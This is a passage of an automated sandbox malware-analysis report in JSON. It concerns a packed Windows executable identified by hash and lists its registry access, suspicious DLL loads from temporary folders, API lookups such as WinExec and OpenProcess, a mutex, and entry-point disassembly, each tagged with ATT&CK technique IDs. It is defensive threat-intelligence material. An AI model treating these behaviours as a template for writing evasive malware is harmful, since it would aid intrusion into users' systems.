"identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70660000\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" loaded module \"KERNEL32\" at base 75500000\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69e00000\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" loaded module \"KERNEL32.DLL\" at base 75500000\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" loaded module \"ADVAPI32.DLL\" at base 76230000\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" loaded module \"OLEAUT32.DLL\" at base 75b50000\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" loaded module \"SHELL32.DLL\" at base 762e0000\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" loaded module \"USER32.DLL\" at base 772f0000\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" loaded module \"OLE32.DLL\" at base 75f30000\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" loaded module \"CRYPTBASE.DLL\" at base 74f70000\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73d60000\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" loaded module \"COMCTL32.DLL\" at base 73f70000\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" loaded module \"CLBCATQ.DLL\" at base 75c50000\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73e30000\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75500000\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" loaded module \"SETUPAPI.DLL\" at base 76fd0000\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" loaded module \"RPCRT4.DLL\" at base 75450000\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" loaded module \"NTMARTA.DLL\" at base 744e0000\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74f20000\n \"explorer.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70660000\n \"explorer.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"explorer.exe\" loaded module \"KERNEL32\" at base 75500000\n \"explorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"explorer.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69e00000\n \"explorer.exe\" loaded module \"OLE32.DLL\" at base 75f30000\n \"explorer.exe\" loaded module \"CRYPTBASE.DLL\" at base 74f70000\n \"explorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73d60000\n \"explorer.exe\" loaded module \"KERNEL32.DLL\" at base 75500000\n \"explorer.exe\" loaded module \"COMCTL32.DLL\" at base 73f70000\n \"explorer.exe\" loaded module \"OLEAUT32.DLL\" at base 75b50000\n \"explorer.exe\" loaded module \"ADVAPI32.DLL\" at base 76230000\n \"explorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75500000\n \"explorer.exe\" loaded module \"SETUPAPI.DLL\" at base 76fd0000\n \"explorer.exe\" loaded module \"RPCRT4.DLL\" at base 75450000\n \"explorer.exe\" loaded module \"CLBCATQ.DLL\" at base 75c50000\n \"explorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73e30000\n \"explorer.exe\" loaded module \"NTMARTA.DLL\" at base 744e0000\n \"explorer.exe\" loaded module \"SHELL32.DLL\" at base 762e0000\n \"explorer.exe\" loaded module \"%COMMONPROGRAMFILES%\\UIUI8.DLL\" at base 310000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"LoadLibrary\" with a parameter KERNEL32.DLL (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"LoadLibrary\" with a parameter oleaut32.dll (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005784)\n \"explorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005848)\n \"explorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005848)\n \"explorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005848)\n \"explorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005848)\n \"explorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005848)\n \"explorer.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005848)\n \"explorer.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005848)\n \"explorer.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005848)\n \"explorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005848)\n \"explorer.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005848)\n \"explorer.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005848)\n \"explorer.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005848)\n \"explorer.exe\" called \"LoadLibrary\" with a parameter %COMMONPROGRAMFILES%\\uiui8.dll (UID: 00000000-00005848)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"explorer.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"explorer.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\b3f23ff8c59e64f9be486251e01e245a\"\n \"b3f23ff8c59e64f9be486251e01e245a\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75450000\n \"explorer.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75450000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"explorer.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"explorer.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"explorer.exe\" searching for class \"IEFrame\"\n \"explorer.exe\" searching for class \"_____TTFrameWnd__101__\"\n \"explorer.exe\" searching for class \"Maxthon2_Frame\"\n \"explorer.exe\" searching for class \"360se_Frame\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"explorer.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"uiui8.dll\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"DISMHOST.EXE.67A9C787.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x43e000,lea\tedi, [esi - 0x3d000],push\tedi,or\tebp, 0xffffffff,jmp\t0x448bd2,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x448bd9,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x448bc8,mov\teax, 1,add\tebx, ebx,jne\t0x448beb,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x448bfc,jne\t0x448c1b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x448c1b,dec\teax,add\tebx, ebx,jne\t0x448c08,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,jmp\t0x448be0,add\tebx, ebx,jne\t0x448c17,mov\tebx, dword ptr [esi],\"\n \"explorer.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x43e000,lea\tedi, [esi - 0x3d000],push\tedi,or\tebp, 0xffffffff,jmp\t0x448bd2,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x448bd9,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x448bc8,mov\teax, 1,add\tebx, ebx,jne\t0x448beb,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x448bfc,jne\t0x448c1b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x448c1b,dec\teax,add\tebx, ebx,jne\t0x448c08,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,jmp\t0x448be0,add\tebx, ebx,jne\t0x448c17,mov\tebx, dword ptr [esi],\"\n \"uiui8.dll\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,add\tesp, -0x44,push\tebx,xor\teax, eax,mov\tdword ptr [ebp - 0x40], eax,mov\tdword ptr [ebp - 0x44], eax,mov\teax, 0x403ef8,call\t0x403598,xor\teax, eax,push\tebp,push\t0x404070,push\tdword ptr fs:[eax],mov\tdword ptr fs:[eax], esp,push\t0x404080,push\t0,push\t4,call\t0x403690,mov\tdword ptr [0x4066cc], eax,cmp\tdword ptr [0x4066cc], 0,je\t0x404055,xor\tedx, edx,push\tebp,push\t0x40404e,push\tdword ptr fs:[edx],mov\tdword ptr fs:[edx], esp,push\t0,push\t0,push\t0,push\t4,mov\teax, dword ptr [0x4066cc],push\teax,\"\n \"DISMHOST.EXE.67A9C787.bin\" file has an entrypoint instructions - \"call\t0x100a7e6,jmp\t0x10097f4,int3\t,int3\t,int3\t,int3\t,int3\t,push\t0x14,push\t0x1010878,call\t0x1009d10,and\tdword ptr [ebp - 4], 0,dec\tdword ptr [ebp + 0x10],js\t0x1009afc,mov\tecx, dword ptr [ebp + 8],sub\tecx, dword ptr [ebp + 0xc],mov\tdword ptr [ebp + 8], ecx,call\tdword ptr [ebp + 0x14],jmp\t0x1009abc,mov\teax, dword ptr [ebp - 0x14],mov\tdword ptr [ebp - 0x1c], eax,mov\teax, dword ptr [ebp - 0x1c],mov\teax, dword ptr [eax],mov\tdword ptr [ebp - 0x20], eax,mov\teax, dword ptr [ebp - 0x20],cmp\tdword ptr [eax], 0xe06d7363,je\t0x1009af3,mov\tdword ptr [ebp - 0x24], 0,mov\teax, dword ptr [ebp - 0x24],ret\t,call\tdword ptr [0x1001210],mov\tesp, dword ptr [ebp - 0x18],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter WinExec (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter SizeofResource (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter SetEndOfFile (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter OpenProcess (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter OpenMutexA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter MoveFileExA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter MoveFileA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter LockResource (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter LoadResource (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00005784)\n 